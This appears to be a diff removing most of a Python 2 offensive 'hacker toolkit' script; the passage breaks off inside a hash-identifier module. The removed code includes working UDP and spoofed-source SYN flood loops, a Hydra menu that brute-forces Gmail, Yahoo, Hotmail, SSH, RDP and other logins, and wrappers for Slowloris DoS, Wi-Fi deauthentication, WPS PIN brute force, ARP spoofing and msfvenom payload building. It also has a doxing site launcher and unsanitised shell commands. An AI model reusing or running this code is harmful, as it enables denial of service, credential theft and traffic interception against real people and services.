-#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - 